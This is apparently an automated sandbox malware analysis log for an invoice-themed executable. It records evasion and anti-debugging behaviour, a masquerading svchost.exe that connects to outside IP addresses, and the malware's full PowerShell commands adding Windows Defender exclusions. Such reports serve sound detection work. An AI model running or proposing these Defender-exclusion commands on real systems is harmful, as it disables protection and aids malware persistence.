      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to delay execution (extensive OutputDebugStringW loop)Show sources
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeSection loaded: OutputDebugStringW count: 3875
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeSection loaded: OutputDebugStringW count: 1933
      Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0056E090 sidt fword ptr [ebx+7364E8C8h]
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5095
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1249
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3214
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 863
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 2015
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 7539
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 529
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4728Thread sleep time: -23980767295822402s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6028Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 968Thread sleep time: -14757395258967632s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: powershell.exe, 00000002.00000003.1411446060.0000000005281000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.1490610672.0000000004DE0000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: explorer.exe, 0000000B.00000003.1360321679.0000000000E9B000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
      Source: WerFault.exe, 00000016.00000003.1409301376.00000000056A0000.00000004.00000001.sdmpBinary or memory string: cqotVy#iulzVMciulzVMYQCv
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1686201376.0000000006280000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1676071962.00000000060D0000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1645310696.00000000067E0000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.1491875569.0000000004F40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: svchost.exeBinary or memory string: iulzVMciulzVMYQCv
      Source: WerFault.exe, 00000016.00000002.1491495678.0000000004C84000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 0000000C.00000002.1613879076.00000000012F6000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
      Source: explorer.exe, 0000000B.00000003.1360321679.0000000000E9B000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1686201376.0000000006280000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1676071962.00000000060D0000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1645310696.00000000067E0000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.1491875569.0000000004F40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1686201376.0000000006280000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1676071962.00000000060D0000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1645310696.00000000067E0000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.1491875569.0000000004F40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000001.00000002.1686201376.0000000006280000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1676071962.00000000060D0000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1645310696.00000000067E0000.00000002.00000001.sdmp, WerFault.exe, 00000016.00000002.1491875569.0000000004F40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: powershell.exe, 00000002.00000003.1411446060.0000000005281000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.1490610672.0000000004DE0000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeCode function: 1_2_06D4AE98 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,06D4C707,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeThread information set: HideFromDebugger
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeNetwork Connect: 104.21.71.230 80
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeNetwork Connect: 172.67.172.17 80
      Adds a directory exclusion to Windows DefenderShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force
      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force
